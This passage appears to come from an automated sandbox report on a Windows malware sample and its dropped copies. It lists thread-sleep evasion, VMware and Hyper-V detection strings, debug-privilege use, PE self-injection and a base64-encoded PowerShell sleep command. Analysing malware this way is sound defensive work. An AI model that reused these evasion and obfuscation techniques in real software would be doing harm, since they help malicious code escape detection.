              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198966s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198812s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198685s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198451s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198312s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198185s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198062s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197936s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197810s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197656s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197492s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197250s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196906s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196703s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196562s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196405s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196247s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196109s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195997s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195874s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195765s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195655s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195545s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195406s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195280s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195171s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195046s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194937s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194824s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194703s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194593s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194484s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194374s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194265s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194156s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194046s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193934s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193811s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193656s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193544s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193420s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193285s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193150s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193006s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1192887s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1192772s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1192647s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 3312Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 3312Thread sleep count: 34 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 3160Thread sleep count: 9536 > 30
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5176Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5176Thread sleep count: 41 > 30
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 3924Thread sleep count: 9623 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 5040Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 5040Thread sleep count: 44 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4556Thread sleep count: 9596 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -11990383647911201s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5172Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4980Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4980Thread sleep count: 39 > 30
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4936Thread sleep count: 9642 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4424Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 1812Thread sleep count: 639 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1200000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1198890s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1198750s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1198343s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1198203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197874s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197561s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197296s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197077s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196949s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196750s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196593s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196390s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1195843s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1195587s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1195093s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3068Thread sleep count: 2115 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1200000
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199812
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199514
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199359
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199233
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199106
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198966
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198812
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198685
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198451
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198312
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198185
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198062
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197936
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197810
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197656
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197492
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197250
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196906
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196703
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196562
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196405
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196247
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196109
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195997
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195874
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195765
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195655
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195545
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195406
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195280
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195171
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195046
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194937
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194824
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194703
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194593
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194484
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194374
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194265
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194156
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194046
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193934
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193811
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193656
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193544
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193420
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193285
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193150
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193006
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192887
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192772
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192647
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1200000
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198890
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198343
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198203
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197874
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197561
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197296
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197077
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196949
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196593
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196390
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195843
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195587
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195093
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindow / User API: threadDelayed 9668
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9400
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindow / User API: threadDelayed 9210
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow / User API: threadDelayed 9536
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9623
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow / User API: threadDelayed 9596
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7267
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9642
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9081
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow / User API: threadDelayed 639
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2115
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1200000
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199812
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199514
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199359
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199233
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199106
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198966
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198812
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198685
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198451
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198312
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198185
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198062
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197936
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197810
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197656
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197492
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197250
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196906
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196703
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196562
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196405
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196247
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196109
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195997
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195874
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195765
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195655
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195545
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195406
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195280
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195171
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195046
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194937
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194824
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194703
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194593
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194484
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194374
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194265
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194156
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194046
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193934
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193811
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193656
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193544
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193420
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193285
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193150
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193006
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192887
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192772
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192647
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1200000
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198890
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198343
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198203
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197874
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197561
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197296
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197077
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196949
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196593
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196390
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195843
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195587
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195093
              Source: Oefdyik.exe, 0000001B.00000002.519934856.00000000011B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll096
              Source: kDPmkTm.exe, 00000011.00000002.520665643.000000000126D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: izwFjkhFJm.exe, 0000000F.00000003.344564244.0000000001519000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Encrypted powershell cmdline option found
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess created: Base64 decoded start-sleep -seconds 20
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeMemory written: C:\Users\user\Desktop\izwFjkhFJm.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeMemory written: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
